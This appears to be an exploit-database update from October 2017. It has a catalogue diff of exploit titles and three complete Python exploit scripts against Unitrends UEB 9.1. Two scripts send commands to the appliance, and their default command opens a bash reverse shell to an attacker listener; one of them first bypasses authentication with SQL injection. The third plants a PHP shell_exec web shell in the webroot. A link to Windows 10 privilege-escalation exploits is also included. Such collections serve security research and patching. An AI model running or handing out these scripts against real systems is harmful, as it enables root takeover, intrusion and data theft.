DB: 2017-10-07

4 new exploits

Konqueror 3.5.9 - (font color) Remote Crash
Konqueror 3.5.9 - 'font color' Remote Crash

Microsoft Windows 10 x64 RS2 - 'win32kfull!bFill' Pool Overflow

hammer software metagauge 1.0.0.17 - Directory Traversal
Hammer Software MetaGauge 1.0.0.17 - Directory Traversal

Billion Router 7700NR4 - Remote Command Execution
Billion 7700NR4 Router - Remote Command Execution

Unitrends UEB 9.1 - 'Unitrends bpserverd' Remote Command Execution

Unitrends UEB 9.1 - Authentication Bypass / Remote Command Execution

else if CMS 0.6 - Multiple Vulnerabilities
Else If CMS 0.6 - Multiple Vulnerabilities

Picturesolution 2.1 - 'config.php path' Remote File Inclusion
Picturesolution 2.1 - 'config.php' 'path' Remote File Inclusion

tsmim Lessons Library - 'show.php' SQL Injection
Tsmim Lessons Library - 'show.php' SQL Injection

Simple Machines Forum (SMF) 1.1.6 - POST Filter Security Bypass
Simple Machines Forum (SMF) 1.1.6 - 'POST' Filter Security Bypass

PHP-Fusion v7.02.07 - Blind SQL Injection
PHP-Fusion 7.02.07 - Blind SQL Injection

ZTE ZXHN H108N - Unauthenticated Config Download
ZTE ZXHN H108N Router - Unauthenticated Config Download

Unitrends UEB 9.1 - Privilege Escalation

files.csv

@@ -820,7 +820,7 @@ id,file,description,date,author,platform,type,port
 6671,platforms/windows/dos/6671.c,"Microsoft Windows Vista - Access Violation from Limited Account Exploit (Blue Screen of Death)",2008-10-04,Defsanguje,windows,dos,0
 6672,platforms/windows/dos/6672.txt,"AyeView 2.20 - Invalid Bitmap Header Parsing Crash",2008-10-05,suN8Hclf,windows,dos,0
 6673,platforms/windows/dos/6673.txt,"FastStone Image Viewer 3.6 - '.BMP' Image Crash",2008-10-05,suN8Hclf,windows,dos,0
-6689,platforms/linux/dos/6689.txt,"Konqueror 3.5.9 - (font color) Remote Crash",2008-10-06,"Jeremy Brown",linux,dos,0
+6689,platforms/linux/dos/6689.txt,"Konqueror 3.5.9 - 'font color' Remote Crash",2008-10-06,"Jeremy Brown",linux,dos,0
 6704,platforms/linux/dos/6704.txt,"Konqueror 3.5.9 - (color/bgcolor) Multiple Remote Crash Vulnerabilities",2008-10-08,"Jeremy Brown",linux,dos,0
 6716,platforms/windows/dos/6716.pl,"Microsoft Windows - GDI+ (PoC) (MS08-052) (2)",2008-10-09,"John Smith",windows,dos,0
 6717,platforms/windows/dos/6717.py,"WinFTP Server 2.3.0 - (PASV mode) Remote Denial of Service",2008-10-09,dmnt,windows,dos,0
@@ -9279,6 +9279,7 @@ id,file,description,date,author,platform,type,port
 42937,platforms/linux/local/42937.txt,"UCOPIA Wireless Appliance < 5.1.8 - Restricted Shell Escape",2017-10-02,Sysdream,linux,local,0
 42948,platforms/osx/local/42948.txt,"Apple Mac OS X + Safari - Local Javascript Quarantine Bypass",2017-07-15,"Filippo Cavallarin",osx,local,0
 42951,platforms/windows/local/42951.py,"DiskBoss Enterprise 8.4.16 - Local Buffer Overflow",2017-10-03,C4t0ps1s,windows,local,0
+42960,platforms/win_x86-64/local/42960.txt,"Microsoft Windows 10 x64 RS2 - 'win32kfull!bFill' Pool Overflow",2017-10-06,siberas,win_x86-64,local,0
 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
 5,platforms/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@@ -10312,7 +10313,7 @@ id,file,description,date,author,platform,type,port
 6656,platforms/windows/remote/6656.txt,"Microsoft Windows - GDI (EMR_COLORMATCHTOTARGETW) Exploit (MS08-021)",2008-10-02,Ac!dDrop,windows,remote,0
 6661,platforms/windows/remote/6661.txt,"Serv-U FTP Server 7.3 - Authenticated Remote FTP File Replacement",2008-10-03,dmnt,windows,remote,0
 6666,platforms/windows/remote/6666.pl,"mIRC 6.34 - Remote Buffer Overflow",2008-10-04,SkD,windows,remote,0
-6686,platforms/windows/remote/6686.txt,"hammer software metagauge 1.0.0.17 - Directory Traversal",2008-10-06,"Brad Antoniewicz",windows,remote,0
+6686,platforms/windows/remote/6686.txt,"Hammer Software MetaGauge 1.0.0.17 - Directory Traversal",2008-10-06,"Brad Antoniewicz",windows,remote,0
 6690,platforms/windows/remote/6690.html,"Skype extension for Firefox Beta 2.2.0.95 - Clipboard Writing",2008-10-07,irk4z,windows,remote,0
 6699,platforms/windows/remote/6699.html,"Microsoft PicturePusher - ActiveX Cross-Site Arbitrary File Upload (PoC)",2008-10-08,Nine:Situations:Group,windows,remote,0
 6750,platforms/hardware/remote/6750.txt,"Telecom Italia Alice Pirelli routers - Backdoor from internal LAN/WAN",2008-10-14,"saxdax & drpepperONE",hardware,remote,0
@@ -15646,7 +15647,7 @@ id,file,description,date,author,platform,type,port
 40457,platforms/windows/remote/40457.py,"Dup Scout Enterprise 9.0.28 - 'Login' Buffer Overflow",2016-10-05,Tulpa,windows,remote,80
 40458,platforms/windows/remote/40458.py,"Disk Sorter Enterprise 9.0.24 - 'Login' Buffer Overflow",2016-10-05,Tulpa,windows,remote,80
 40459,platforms/windows/remote/40459.py,"Disk Savvy Enterprise 9.0.32 - 'Login' Buffer Overflow",2016-10-05,Tulpa,windows,remote,80
-40472,platforms/hardware/remote/40472.py,"Billion Router 7700NR4 - Remote Command Execution",2016-10-06,R-73eN,hardware,remote,0
+40472,platforms/hardware/remote/40472.py,"Billion 7700NR4 Router - Remote Command Execution",2016-10-06,R-73eN,hardware,remote,0
 40474,platforms/hardware/remote/40474.txt,"Exagate WEBPack Management System - Multiple Vulnerabilities",2016-10-06,"Halil Dalabasmaz",hardware,remote,0
 40491,platforms/multiple/remote/40491.py,"HP Client 9.1/9.0/8.1/7.9 - Command Injection",2016-10-10,SlidingWindow,multiple,remote,0
 40507,platforms/linux/remote/40507.py,"Subversion 1.6.6/1.6.12 - Code Execution",2016-10-12,GlacierZ0ne,linux,remote,0
@@ -15887,9 +15888,11 @@ id,file,description,date,author,platform,type,port
 42888,platforms/hardware/remote/42888.sh,"Cisco Prime Collaboration Provisioning < 12.1 - Authentication Bypass / Remote Code Execution",2017-09-27,"Adam Brown",hardware,remote,0
 42891,platforms/windows/remote/42891.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - MITM Remote Code Execution",2017-09-28,hyp3rlinx,windows,remote,0
 42928,platforms/windows/remote/42928.py,"Sync Breeze Enterprise 10.0.28 - Buffer Overflow",2017-09-30,"Owais Mehtab",windows,remote,0
+42957,platforms/linux/remote/42957.py,"Unitrends UEB 9.1 - 'Unitrends bpserverd' Remote Command Execution",2017-08-08,"Jared Arave",linux,remote,0
 42938,platforms/linux/remote/42938.rb,"Qmail SMTP - Bash Environment Variable Injection (Metasploit)",2017-10-02,Metasploit,linux,remote,0
 42949,platforms/linux/remote/42949.txt,"UCOPIA Wireless Appliance < 5.1 (Captive Portal) - Unauthenticated Root Remote Code Execution",2017-10-02,agix,linux,remote,0
 42952,platforms/windows/remote/42952.py,"ERS Data System 1.8.1 - Java Deserialization",2017-09-21,"West Shepherd",windows,remote,0
+42958,platforms/linux/remote/42958.py,"Unitrends UEB 9.1 - Authentication Bypass / Remote Command Execution",2017-08-08,"Jared Arave",linux,remote,0
 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
 13242,platforms/bsd/shellcode/13242.txt,"BSD - Reverse TCP /bin/sh Shell (127.0.0.1:31337/TCP) Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@@ -18717,9 +18720,9 @@ id,file,description,date,author,platform,type,port
 4485,platforms/php/webapps/4485.txt,"Trionic Cite CMS 1.2rev9 - Remote File Inclusion",2007-10-05,GoLd_M,php,webapps,0
 4486,platforms/asp/webapps/4486.txt,"Furkan Tastan Blog - SQL Injection",2007-10-05,CyberGhost,asp,webapps,0
 4489,platforms/php/webapps/4489.txt,"Joomla! Component panoramic 1.0 - Remote File Inclusion",2007-10-06,NoGe,php,webapps,0
-4490,platforms/php/webapps/4490.txt,"else if CMS 0.6 - Multiple Vulnerabilities",2007-10-06,"HACKERS PAL",php,webapps,0
+4490,platforms/php/webapps/4490.txt,"Else If CMS 0.6 - Multiple Vulnerabilities",2007-10-06,"HACKERS PAL",php,webapps,0
 4491,platforms/php/webapps/4491.php,"CMS Creamotion - 'securite.php' Remote File Inclusion",2007-10-06,"HACKERS PAL",php,webapps,0
-4492,platforms/php/webapps/4492.txt,"Picturesolution 2.1 - 'config.php path' Remote File Inclusion",2007-10-06,Mogatil,php,webapps,0
+4492,platforms/php/webapps/4492.txt,"Picturesolution 2.1 - 'config.php' 'path' Remote File Inclusion",2007-10-06,Mogatil,php,webapps,0
 4493,platforms/php/webapps/4493.txt,"SkaDate Online 5.0/6.0 - Remote File Disclosure",2007-10-06,SnIpEr_SA,php,webapps,0
 4494,platforms/php/webapps/4494.txt,"Verlihub Control Panel 1.7.x - Local File Inclusion",2007-10-07,TEAMELITE,php,webapps,0
 4495,platforms/php/webapps/4495.txt,"idmos-phoenix CMS - 'aural.php' Remote File Inclusion",2007-10-07,"HACKERS PAL",php,webapps,0
@@ -25740,7 +25743,7 @@ id,file,description,date,author,platform,type,port
 17926,platforms/php/webapps/17926.txt,"Easy Hosting Control Panel - Admin Authentication Bypass",2011-10-04,Jasman,php,webapps,0
 17927,platforms/php/webapps/17927.txt,"CF Image Hosting Script 1.3.82 - File Disclosure",2011-10-04,bd0rk,php,webapps,0
 18033,platforms/php/webapps/18033.txt,"Joomla! Component 'com_yjcontactus' - Local File Inclusion",2011-10-25,MeGo,php,webapps,0
-17935,platforms/php/webapps/17935.txt,"tsmim Lessons Library - 'show.php' SQL Injection",2011-10-06,M.Jock3R,php,webapps,0
+17935,platforms/php/webapps/17935.txt,"Tsmim Lessons Library - 'show.php' SQL Injection",2011-10-06,M.Jock3R,php,webapps,0
 17937,platforms/php/webapps/17937.txt,"URL Shortener Script 1.0 - SQL Injection",2011-10-07,M.Jock3R,php,webapps,0
 17938,platforms/php/webapps/17938.txt,"EFront 3.6.9 Community Edition - Multiple Vulnerabilities",2011-10-07,IHTeam,php,webapps,0
 17941,platforms/linux/webapps/17941.rb,"Spreecommerce 0.60.1 - Arbitrary Command Execution (Metasploit)",2011-10-07,Metasploit,linux,webapps,0
@@ -33116,7 +33119,7 @@ id,file,description,date,author,platform,type,port
 32455,platforms/php/webapps/32455.pl,"Website Directory - 'index.php' Cross-Site Scripting",2008-10-03,"Ghost Hacker",php,webapps,0
 32459,platforms/java/webapps/32459.txt,"VeriSign Kontiki Delivery Management System 5.0 - 'action' Parameter Cross-Site Scripting",2008-10-05,"Mazin Faour",java,webapps,0
 32461,platforms/php/webapps/32461.txt,"AmpJuke 0.7.5 - 'index.php' SQL Injection",2008-10-03,S_DLA_S,php,webapps,0
-32462,platforms/php/webapps/32462.txt,"Simple Machines Forum (SMF) 1.1.6 - POST Filter Security Bypass",2008-10-06,WHK,php,webapps,0
+32462,platforms/php/webapps/32462.txt,"Simple Machines Forum (SMF) 1.1.6 - 'POST' Filter Security Bypass",2008-10-06,WHK,php,webapps,0
 32463,platforms/php/webapps/32463.txt,"PHP Web Explorer 0.99b - main.php refer Parameter Traversal Local File Inclusion",2008-10-06,Pepelux,php,webapps,0
 32464,platforms/php/webapps/32464.txt,"PHP Web Explorer 0.99b - 'edit.php' File Parameter Traversal Local File Inclusion",2008-10-06,Pepelux,php,webapps,0
 32467,platforms/php/webapps/32467.txt,"Opera Web Browser 8.51 - URI redirection Remote Code Execution",2008-10-08,MATASANOS,php,webapps,0
@@ -36647,10 +36650,10 @@ id,file,description,date,author,platform,type,port
 38395,platforms/jsp/webapps/38395.txt,"ManageEngine ServiceDesk Plus 9.1 build 9110 - Directory Traversal",2015-10-05,xistence,jsp,webapps,8080
 38537,platforms/php/webapps/38537.txt,"WordPress Plugin ADIF Log Search Widget - 'logbook_search.php' Cross-Site Scripting",2013-05-27,k3170makan,php,webapps,0
 38400,platforms/php/webapps/38400.txt,"Alienvault Open Source SIEM (OSSIM) 4.3 - Cross-Site Request Forgery",2015-10-05,"MohamadReza Mohajerani",php,webapps,0
-38406,platforms/php/webapps/38406.txt,"PHP-Fusion v7.02.07 - Blind SQL Injection",2015-10-06,"Manuel García Cárdenas",php,webapps,0
+38406,platforms/php/webapps/38406.txt,"PHP-Fusion 7.02.07 - Blind SQL Injection",2015-10-06,"Manuel García Cárdenas",php,webapps,0
 38407,platforms/php/webapps/38407.txt,"GLPI 0.85.5 - Arbitrary File Upload / Filter Bypass / Remote Code Execution",2015-10-06,"Raffaele Forte",php,webapps,0
 38408,platforms/php/webapps/38408.txt,"Jaow CMS - 'add_ons' Parameter Cross-Site Scripting",2013-03-23,Metropolis,php,webapps,0
-38409,platforms/hardware/webapps/38409.html,"ZTE ZXHN H108N - Unauthenticated Config Download",2015-10-06,"Todor Donev",hardware,webapps,0
+38409,platforms/hardware/webapps/38409.html,"ZTE ZXHN H108N Router - Unauthenticated Config Download",2015-10-06,"Todor Donev",hardware,webapps,0
 38410,platforms/php/webapps/38410.txt,"WordPress Plugin Banners Lite - 'wpbanners_show.php' HTML Injection",2013-03-25,"Fernando A. Lagos B",php,webapps,0
 38411,platforms/python/webapps/38411.txt,"Zope Management Interface 4.3.7 - Cross-Site Request Forgery",2015-10-07,hyp3rlinx,python,webapps,0
 38413,platforms/php/webapps/38413.txt,"OrionDB Web Directory - Multiple Cross-Site Scripting Vulnerabilities",2013-03-27,3spi0n,php,webapps,0
@@ -38654,3 +38657,4 @@ id,file,description,date,author,platform,type,port
 42953,platforms/windows/webapps/42953.txt,"Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP Upload Bypass / Remote Code Execution",2017-09-20,xxlegend,windows,webapps,0
 42954,platforms/php/webapps/42954.py,"ClipBucket 2.8.3 - Remote Code Execution",2017-10-04,"Meisam Monsef",php,webapps,0
 42956,platforms/hardware/webapps/42956.txt,"NETGEAR ReadyNAS Surveillance 1.4.3-16 - Remote Command Execution",2017-09-27,"Kacper Szurek",hardware,webapps,0
+42959,platforms/php/webapps/42959.py,"Unitrends UEB 9.1 - Privilege Escalation",2017-08-08,"Jared Arave",php,webapps,0

platforms/linux/remote/42957.py

@@ -0,0 +1,166 @@
+# Exploit Title: Unauthenticated root RCE for Unitrends UEB 9.1
+# Date: 08/08/2017
+# Exploit Authors: Jared Arave, Cale Smith, Benny Husted
+# Contact: https://twitter.com/iotennui || https://twitter.com/BennyHusted || https://twitter.com/0xC413
+# Vendor Homepage: https://www.unitrends.com/
+# Software Link: https://www.unitrends.com/download/enterprise-backup-software
+# Version: 9.1
+# Tested on: CentOS6
+# CVE: CVE-2017-12477
+
+import socket
+import binascii
+import struct
+import time
+import sys
+from optparse import OptionParser
+
+print """
+###############################################################################
+Unauthenticated root RCE for Unitrends UEB 9.1
+Tested against appliance versions:
+  [+] 9.1.0-2.201611302120.CentOS6
+
+This exploit uses roughly the same process to gain root execution
+as does the apache user on the Unitrends appliance. The process is
+something like this:
+
+1.  Connect to xinetd process (it's usually running on port 1743)
+2.  This process will send something like: '?A,Connect36092'
+3.  Initiate a second connection to the port specified 
+    in the packet from xinetd (36092 in this example)
+4.  send a specially crafted packet to xinetd, containing the 
+    command to be executed as root
+5.  Receive command output from the connection to port 36092
+6.  Close both connections
+
+NB: Even if you don't strictly need output from your command,
+The second connection must still be made for the command
+to be executed at all.
+###############################################################################
+"""
+
+# Parse command line args:
+usage = "Usage: %prog -r <appliance_ip> -l <listener_ip> -p <listener_port>\n"\
+      "       %prog -r <appliance_ip> -c 'touch /tmp/foooooooooooo'"
+
+parser = OptionParser(usage=usage)
+parser.add_option("-r", '--RHOST', dest='rhost', action="store",
+          help="Target host w/ UNITRENDS UEB installation")
+parser.add_option("-l", '--LHOST', dest='lhost', action="store",
+          help="Host listening for reverse shell connection")
+parser.add_option("-p", '--LPORT', dest='lport', action="store",
+          help="Port on which nc is listening")
+parser.add_option("-c", '--cmd', dest='cmd', action="store",
+          help="Run a custom command, no reverse shell for you.")
+parser.add_option("-x", '--xinetd', dest='xinetd', action="store",
+          type="int", default=1743,   
+          help="port on which xinetd is running (default: 1743)")
+
+(options, args) = parser.parse_args()
+
+if options.cmd:
+  if (options.lhost or options.lport):
+    parser.error("[!] Options --cmd and [--LHOST||--LPORT] are mutually exclusive.\n")
+
+  elif not options.rhost:
+    parser.error("[!] No remote host specified.\n")
+
+elif options.rhost is None or options.lhost is None or options.lport is None:
+  parser.print_help()
+  sys.exit(1)
+
+RHOST = options.rhost
+LHOST = options.lhost
+LPORT = options.lport
+XINETDPORT = options.xinetd
+
+if options.cmd:
+  cmd = options.cmd
+else:
+  cmd = 'bash -i >& /dev/tcp/{0}/{1} 0>&1 &'.format(LHOST, LPORT)
+
+def recv_timeout(the_socket,timeout=2):
+    the_socket.setblocking(0)
+    total_data=[];data='';begin=time.time()
+    while 1:
+        #if you got some data, then break after wait sec
+        if total_data and time.time()-begin>timeout:
+            break
+        #if you got no data at all, wait a little longer
+        elif time.time()-begin>timeout*2:
+            break
+        try:
+            data=the_socket.recv(8192)
+            if data:
+                total_data.append(data)
+                begin=time.time()
+            else:
+                time.sleep(0.1)
+        except:
+            pass
+    return ''.join(total_data)
+
+print "[+] attempting to connect to xinetd on {0}:{1}".format(RHOST, str(XINETDPORT))
+
+try:
+  s1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+  s1.connect((RHOST,XINETDPORT))
+except:
+  print "[!] Failed to connect!"
+  exit()
+
+data = s1.recv(4096)
+bpd_port = int(data[-8:-3])
+
+print "[+] Connected! Cmd output will come back on {}:{}".format(RHOST, str(bpd_port))
+print "[+] Connecting to bpdserverd on {}:{}".format(RHOST, str(bpd_port))
+
+try:
+  s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+  s2.connect((RHOST, bpd_port))
+except:
+  print "[!] Failed to connect!"
+  s1.close()
+  exit()
+
+print "[+] Connected! Sending the following cmd to {0}:{1}".format(RHOST,str(XINETDPORT))
+print "[+] '{0}'".format(cmd)
+
+if (len(cmd) > 240):
+  print "[!] This command is long; this might not work."
+  print "[!] Maybe try a shorter command..."
+
+cmd_len = chr(len(cmd) + 3)
+packet_len = chr(len(cmd) + 23)
+
+packet = '\xa5\x52\x00\x2d'
+packet += '\x00' * 3
+packet += packet_len
+packet += '\x00' * 3
+packet += '\x01'
+packet += '\x00' * 3
+packet += '\x4c'
+packet += '\x00' * 3
+packet += cmd_len
+packet += cmd
+packet += '\x00' * 3
+
+s1.send(packet)
+
+print "[+] cmd packet sent!"
+print "[+] Waiting for response from {0}:{1}".format(RHOST,str(bpd_port))
+
+data = recv_timeout(s2)
+
+print "[+] Here's the output -> \n\n"
+
+print data
+
+print "[+] Closing ports, exiting...."
+
+s1.close()
+s2.close()
+
+# 3. Solution:
+# Update to Unitrends UEB 10

platforms/linux/remote/42958.py

@@ -0,0 +1,116 @@
+# Exploit Title: Unauthenticated root RCE for Unitrends UEB 9.1
+# Date: 08/08/2017
+# Exploit Authors: Cale Smith, Benny Husted, Jared Arave
+# Contact: https://twitter.com/iotennui || https://twitter.com/BennyHusted || https://twitter.com/0xC413
+# Vendor Homepage: https://www.unitrends.com/
+# Software Link: https://www.unitrends.com/download/enterprise-backup-software
+# Version: 9.1
+# Tested on: CentOS6
+# CVE: CVE-2017-12478
+
+import httplib
+import urllib
+import ssl
+import random
+import sys
+import base64
+import string
+from optparse import OptionParser
+
+# Print some helpful words:
+print """
+###############################################################################
+Unauthenticated root RCE for Unitrends UEB 9.1
+Tested against appliance versions:
+  [+] 9.1.0-2.201611302120.CentOS6
+
+This exploit leverages a sqli vulnerability for authentication bypass,
+together with command injection for subsequent root RCE. 
+
+To use the exploit as written, make sure you're running a reverse
+shell listener somewhere, using a command like:
+
+$ nc -nlvp 1234
+
+Then, just specify the ip and port of the remote listener in the 
+exploit command. Alternatively, modify this exploit to contain a 
+command of your choosing by modifying the 'cmd' variable below.
+###############################################################################
+"""
+
+# Disable SSL Cert validation
+if hasattr(ssl, '_create_unverified_context'):
+            ssl._create_default_https_context = ssl._create_unverified_context
+
+# Parse command line args:
+usage = "Usage: %prog -r <appliance_ip> -l <listener_ip> -p <listener_port>\n"\
+	    "       %prog -c 'touch /tmp/foooooooooooo'"
+
+parser = OptionParser(usage=usage)
+parser.add_option("-r", '--RHOST', dest='rhost', action="store",
+				  help="Target host w/ UNITRENDS UEB installation")
+parser.add_option("-l", '--LHOST', dest='lhost', action="store",
+				  help="Host listening for reverse shell connection")
+parser.add_option("-p", '--LPORT', dest='lport', action="store",
+				  help="Port on which nc is listening")
+parser.add_option("-c", '--cmd', dest='cmd', action="store",
+				  help="Run a custom command, no reverse shell for you.")
+
+(options, args) = parser.parse_args()
+
+if options.cmd:
+	if (options.lhost or options.lport):
+		parser.error("[!] Options --cmd and [--LHOST||--LPORT] are mututally exclusive.\n")
+
+	elif not options.rhost:
+		parser.error("[!] No remote host specified.\n")
+
+elif options.rhost is None or options.lhost is None or options.lport is None:
+	parser.print_help()
+	sys.exit(1)
+
+RHOST = options.rhost
+LHOST = options.lhost
+LPORT = options.lport
+if options.cmd:
+	cmd = options.cmd
+else:
+	cmd = 'bash -i >& /dev/tcp/{0}/{1} 0>&1 &'.format(LHOST, LPORT)
+
+url = '/api/storage/'
+
+# Here, a SQLi string overrides the uuid, providing auth bypass.
+# We'll need to base64 encode before sending... 
+auth = base64.b64encode("v0:b' UNION SELECT -1 -- :1:/usr/bp/logs.dir/gui_root.log:0")
+
+params = urllib.urlencode({'auth' : auth})
+
+params = """{{"type":4,"name":"aaaaaaaa","usage":"archive","properties":{{"username":"km","password":"km","port":"445","hostname":"asdf.com","protocol":"cifs","share_name":"`{0}`"}}}}""".format(cmd)
+
+headers = {'Host' : RHOST,
+		   'Content-Type' : 'application/json',
+		   'X-Requested-With' : 'XMLHttpRequest',
+		   'AuthToken' : auth }
+
+# Establish an HTTPS connection and send the payload.
+conn = httplib.HTTPSConnection(RHOST, 443)
+conn.set_debuglevel(1)
+
+print """
+[+] Sending payload to remote host [https://{0}]
+[+] Here's some debug info:
+""".format(RHOST)
+
+conn.request("POST", url, params, headers=headers)
+r1 = conn.getresponse()
+
+print ""
+print "[+] Request sent. Maybe your command was executed?"
+print ""
+
+# Print response, for debug purposes.
+print r1.status, r1.reason
+print r1.read()
+
+# 3. Solution:
+# Update to Unitrends UEB 10

platforms/php/webapps/42959.py

@@ -0,0 +1,189 @@
+# Exploit Title: Authenticated lowpriv RCE for Unitrends UEB 9.1
+# Date: 08/08/2017
+# Exploit Authors: Benny Husted, Jared Arave, Cale Smith
+# Contact: https://twitter.com/iotennui || https://twitter.com/BennyHusted || https://twitter.com/0xC413
+# Vendor Homepage: https://www.unitrends.com/
+# Software Link: https://www.unitrends.com/download/enterprise-backup-software
+# Version: 9.1
+# Tested on: CentOS6
+# CVE: CVE-2017-12479
+
+import httplib
+import urllib
+import ssl
+import sys
+import base64
+import random
+import time
+import string
+import json
+from optparse import OptionParser
+
+# Print some helpful words:
+print """
+###############################################################################
+Authenticated lowpriv RCE for Unitrends UEB 9.1
+Tested against appliance versions:
+  [+] 9.1.0-2.201611302120.CentOS6
+
+This exploit utilizes some issues in UEB9 session handling to place a 
+php exec one liner in the webroot of the appliance.
+
+Session tokens looks like this:
+
+djA6NmM0ZWMzYTEtZmYwYi00MTIxLTk3YzYtMjQzODljM2EyNjY1OjE6L3Vzci9icC9sb2dzLmRpci9ndWlfcm9vdC5sb2c6MA==
+
+and decodes to this:
+                                                            LOG_LVL ----,
+   v --- UUID ----------------------- v   v -- LOG_DIR -----------v     v
+v0:6c4ec3a1-ff0b-4121-97c6-24389c3a2665:1:/usr/bp/logs.dir/gui_root.log:0 
+
+The general steps that are followed by this poc are:
+
+1. Authenticate as a low priv user and receive an auth token.
+2. Modify the LOG_DIR field to point to a directory in the web root
+   with apache user write access, and make a request to an arbitrary resource.
+   This should touch a new file at the desired location.
+3. Replace the UUID token in this auth token with a php shell_exec on liner, 
+   and modify the LOG_LVL parameter to a value of 5, which will ensure
+   that the UUID is reflected into the log file.
+4. Issue a final request, to generate a shell.php file with a single shell_exec.
+   This step is not strictly necessary.
+###############################################################################
+"""
+
+# Disable SSL Cert validation
+if hasattr(ssl, '_create_unverified_context'):
+            ssl._create_default_https_context = ssl._create_unverified_context
+
+# Parse command line args:
+usage = "Usage: %prog -r <appliance_ip> -u <username> -p <password>\n"\
+
+parser = OptionParser(usage=usage)
+parser.add_option("-r", '--RHOST', dest='rhost', action="store",
+          help="Target host w/ UNITRENDS UEB installation")
+parser.add_option("-u", '--username', dest='username', action="store",
+          help="User with any amount of privilege on unitrends device")
+parser.add_option("-p", '--password', dest='password', action="store",
+          help="password for this user")
+
+(options, args) = parser.parse_args()
+
+if not options.rhost:
+  parser.error("[!] No remote host specified.\n")
+
+elif options.rhost is None or options.username is None or options.password is None:
+  parser.print_help()
+  sys.exit(1)
+
+RHOST = options.rhost
+username = options.username
+password = options.password
+
+################################################################
+# REQUEST ONE: GET A UUID.
+################################################################
+
+url1 = '/api/login'
+
+a = {"username" : username,
+     "password" : password}
+
+post_body = json.dumps(a)
+
+headers1 = {'Host' : RHOST}
+
+print "[+] Attempting to log in to {0}, {1}:{2}".format(RHOST, username, password)
+
+conn = httplib.HTTPSConnection(RHOST, 443)
+conn.set_debuglevel(0)
+conn.request("POST", url1, post_body, headers=headers1)
+r1 = conn.getresponse()
+
+################################################################
+# BUILD THE AUTH TOKENS THAT WE'LL USE IN AN ATTACK.
+################################################################
+
+parsed_json = json.loads(r1.read())
+
+if 'auth_token' not in parsed_json:
+  print "[!] Didn't receive an auth token. Bad creds?"
+  exit()
+
+auth_encoded = parsed_json['auth_token']
+auth_decoded = base64.b64decode(auth_encoded)
+
+uuid = auth_decoded.split(':')[1]
+ssid = auth_decoded.split(':')[2]
+
+# We'll place our command shell in /var/www/html/tempPDF, since apache
+# has rw in this dir.
+
+log_dir = "/var/www/html/tempPDF/"
+log_file = ''.join(random.choice(string.ascii_lowercase) for _ in range(5)) + '.php'
+log_lvl = "5"
+shell = "<?php echo shell_exec($_GET['cmd']);?> >"
+
+auth_mod1 = "v0:{0}:{1}:{2}{3}:{4}".format(uuid, ssid, log_dir, log_file, log_lvl)
+auth_mod2 = "v0:{0}:{1}:{2}{3}:{4}".format(shell, ssid, log_dir, log_file, log_lvl)
+
+auth_mod1 = base64.b64encode(auth_mod1)
+auth_mod2 = base64.b64encode(auth_mod2)
+
+url2 = '/api/summary/current/'
+
+################################################################
+# REQUEST 2: PUT A FILE
+################################################################
+
+print "[+] Making a request to place log to http://{0}/tempPDF/{1}".format(RHOST, log_file)
+
+headers2 = {'Host' : RHOST,
+      'AuthToken' : auth_mod1}
+
+# touch the file
+conn.request("GET", url2, headers=headers2)
+r2 = conn.getresponse()
+
+print "[+] Making request to reflect shell_exec php to {0}.".format(log_file)
+
+headers3 = {'Host' : RHOST,
+      'AuthToken' : auth_mod2}
+
+# make the first command
+time.sleep(.5)
+conn.request("GET", url2, headers=headers3)
+conn.close()
+
+# optional cleanup time
+
+print "[+] Making a request to generate clean shell_exec at http://{0}/tempPDF/shell.php".format(RHOST)
+
+url4 = '/tempPDF/' + log_file
+url4 += '?cmd=echo+-e+"<?php%20echo%20shell_exec(\$_GET[%27cmd%27]);?>"+>+shell.php'
+
+conn1 = httplib.HTTPSConnection(RHOST, 443)
+conn1.request("GET", url4, headers=headers2)
+r3 = conn1.getresponse()
+conn1.close()
+
+
+url5 = "/tempPDF/shell.php"
+print "[+] Checking for presence of http://{0}{1}".format(RHOST, url5)
+headers3 = {'Host' : RHOST}
+
+conn2 = httplib.HTTPSConnection(RHOST, 443)
+conn2.request("GET", url5, headers=headers2)
+r3 = conn2.getresponse()
+
+if r3.status == 200:
+  print "[+] Got a 200 back. We did it."
+  print "[+] Example cmd: http://{0}{1}?cmd=id".format(RHOST, url5)
+else:
+  print "Got a {0} back. Maybe this didn't work.".format(r3.status)
+  print "Try RCE here http://{0}/tempPDF/{1}?cmd=id".format(RHOST, log_file)
+
+conn2.close()
+
+# 3. Solution:
+# Update to Unitrends UEB 10

platforms/win_x86-64/local/42960.txt

@@ -0,0 +1,17 @@
+Sources:
+https://siberas.de/blog/2017/10/05/exploitation_case_study_wild_pool_overflow_CVE-2016-3309_reloaded.html
+https://github.com/siberas/CVE-2016-3309_Reloaded
+
+Exploits for the recently-patched win32kfull!bFill vulnerability. Executing the Palette or Bitmap exploit will give you SYSTEM privileges on the affected system. The exploits should work fine on Windows 10 x64 with Creators Update, build 15063.540 (latest version of Win10 before the release of Microsoft's September Updates).
+
+The Visual Studio solution contains three exploits:
+
+CVE-2016-3309_Reloaded_Bitmaps: Exploit using the Bitmaps technique
+CVE-2016-3309_Reloaded_Palettes: Exploit using the Palettes technique
+CVE-2016-3309_Reloaded_Deadlock: POC exploit showcasing the system deadlock which happens due to improved Handle validation
+
+We also published a blog post (https://siberas.de/blog/2017/10/05/exploitation_case_study_wild_pool_overflow_CVE-2016-3309_reloaded.html) which goes into detail about the exploitation of this "wild" Pool-based overflow.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42960.zip